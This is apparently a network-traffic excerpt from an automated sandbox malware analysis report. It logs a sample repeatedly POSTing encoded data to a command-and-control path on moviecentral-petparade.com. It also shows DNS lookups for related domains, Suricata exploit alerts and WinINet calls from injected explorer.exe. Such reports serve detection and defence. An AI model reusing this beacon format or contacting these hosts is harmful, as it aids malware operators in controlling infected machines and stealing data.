          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49805
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49990
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EF0370 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,12_2_02EF0370
          Source: global trafficDNS traffic detected: DNS query: moviecentral-petparade.com
          Source: global trafficDNS traffic detected: DNS query: moviecentral-petparade2.com
          Source: global trafficDNS traffic detected: DNS query: moviecentral-petparade3.com
          Source: unknownHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
